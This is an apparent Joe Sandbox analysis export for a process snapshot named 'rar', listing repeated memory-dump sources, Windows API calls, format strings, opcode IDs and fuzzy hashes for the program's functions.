                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3659116390-0
                                                                                                                                                                      • Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                      • Instruction ID: f8f45263a325e1523646482531c44f824e222b8a45a7327bacea0bf3b141844d
                                                                                                                                                                      • Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                      • Instruction Fuzzy Hash: 7551D333A14A518AEB11CF65E4443AC3BB0FB54B98F068135EE4E87798DF7AD161C705
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 643171463-0
                                                                                                                                                                      • Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                      • Instruction ID: 2ca82fd1005f8bc6034c42b2cbae92123bff5a731ad1871ded0df8274b3eee23
                                                                                                                                                                      • Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E41CA53E0C68642FF109B20E8003B96251AF65BA0F06033AF96D977D5DFBEE565C70A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 190572456-0
                                                                                                                                                                      • Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                      • Instruction ID: f37647c7b00c15b6d2c87970589ea1896db2cb987b2ce49ec239aefc5b096a38
                                                                                                                                                                      • Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                      • Instruction Fuzzy Hash: 6641C363B0D60191EF119B92E8047B56295BF24B90F1B8635FD5D8B788EE7EE420C30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                      • Instruction ID: c04437dad10109121c00150310c237cf823296e8df9107a9be682f804757bca9
                                                                                                                                                                      • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                      • Instruction Fuzzy Hash: 44113067E18A0309FF551164E48637B2141AF763A0F474A34FB6E966D6CFEFA460C30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcschr$BeepMessage
                                                                                                                                                                      • String ID: ($[%c]%ls
                                                                                                                                                                      • API String ID: 1408639281-228076469
                                                                                                                                                                      • Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                      • Instruction ID: 044b7cd04b320dd50605be9959029b69bfa36d1d227dea4e8af5ae1e30249ba9
                                                                                                                                                                      • Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                      • Instruction Fuzzy Hash: 6381E623A0864186EF60CF05E4403BA67A1FB98B88F460136FE4E97759DF7EE522C705
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: swprintf
                                                                                                                                                                      • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                                                                                                                                      • API String ID: 233258989-622958660
                                                                                                                                                                      • Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                      • Instruction ID: 03a68fd4c53520bab831e7178da2a4d85181468c0677c9f91ed2b2cb543d4a6d
                                                                                                                                                                      • Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                      • Instruction Fuzzy Hash: 275136F3F3C2848AE7548F1CE881BA92690F374B91F555A24F94AD3B44CA3EDA04C705
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcschr
                                                                                                                                                                      • String ID: MCAOmcao$MCAOmcao
                                                                                                                                                                      • API String ID: 1497570035-1725859250
                                                                                                                                                                      • Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                      • Instruction ID: a923d18856f1e3654f9f4654e9dd6656215b29b27196d5e28132f102f0701262
                                                                                                                                                                      • Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                      • Instruction Fuzzy Hash: 46416D53E0D58380EF219AA0E1417795661AF34B84F5A4032FA5D862D5EEBFE472C32B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00007FF6EE75359E
                                                                                                                                                                      • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EE7535E6
                                                                                                                                                                        • Part of subcall function 00007FF6EE7530C8: GetFileAttributesW.KERNELBASE(00000800,00007FF6EE75305D,?,?,?,?,?,?,?,?,00007FF6EE764126,?,?,?,?,00000800), ref: 00007FF6EE7530F0
                                                                                                                                                                        • Part of subcall function 00007FF6EE7530C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6EE764126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6EE753119
                                                                                                                                                                      • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EE753651
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFileswprintf$CurrentProcess
                                                                                                                                                                      • String ID: %u.%03u
                                                                                                                                                                      • API String ID: 2814246642-1114938957
                                                                                                                                                                      • Opcode ID: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
                                                                                                                                                                      • Instruction ID: 75a7cd9e6e95f8efed017bc11b62b38021643b18969eece4664f83efc7365bde
                                                                                                                                                                      • Opcode Fuzzy Hash: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
                                                                                                                                                                      • Instruction Fuzzy Hash: EE316B23A0868151EF149B24E4103AA6260F7A47B4F511336FD7E87BF8DE7ED42AC305
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                      • String ID: U
                                                                                                                                                                      • API String ID: 2456169464-4171548499
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2280078643-1018135373
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                      • String ID: Thread pool initialization failed.
                                                                                                                                                                      • API String ID: 3340455307-2182114853
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 904936192-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF6EE74F6FC,00000000,?,?,?,?,00007FF6EE75097D), ref: 00007FF6EE7538CD
                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,?,?,00007FF6EE74F6FC,00000000,?,?,?,?,00007FF6EE75097D,?,?,00000000), ref: 00007FF6EE75391F
                                                                                                                                                                      • SetFileTime.KERNEL32(?,?,?,?,?,00007FF6EE74F6FC,00000000,?,?,?,?,00007FF6EE75097D,?,?,00000000), ref: 00007FF6EE75399B
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00007FF6EE74F6FC,00000000,?,?,?,?,00007FF6EE75097D,?,?,00000000), ref: 00007FF6EE7539A6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Create$CloseHandleTime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2287278272-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4141327611-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,00007FF6EE7386CB,?,?,?,00007FF6EE73A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6EE732DF9), ref: 00007FF6EE74D09D
• CreateFileW.KERNEL32(?,00007FF6EE7386CB,?,?,?,00007FF6EE73A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6EE732DF9), ref: 00007FF6EE74D0E5
• CreateFileW.KERNEL32(?,00007FF6EE7386CB,?,?,?,00007FF6EE73A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6EE732DF9), ref: 00007FF6EE74D114
• CreateFileW.KERNEL32(?,00007FF6EE7386CB,?,?,?,00007FF6EE73A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6EE732DF9), ref: 00007FF6EE74D15C
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
• Instruction ID: 0bab0daaa30507c4b56e2b0d26666070a9fecb236e2b89ccfef81a9cdab48577
• Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
• Instruction Fuzzy Hash: B7319232618B4542EB608F11F55476A77A0F799BA8F514325EAAC43BC8CF7DD044CB05
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6EE793CEF,?,?,00000000,00007FF6EE793CAA,?,?,00000000,00007FF6EE793FD9), ref: 00007FF6EE7997A5
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6EE793CEF,?,?,00000000,00007FF6EE793CAA,?,?,00000000,00007FF6EE793FD9), ref: 00007FF6EE799807
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6EE793CEF,?,?,00000000,00007FF6EE793CAA,?,?,00000000,00007FF6EE793FD9), ref: 00007FF6EE799841
• FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6EE793CEF,?,?,00000000,00007FF6EE793CAA,?,?,00000000,00007FF6EE793FD9), ref: 00007FF6EE79986B
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
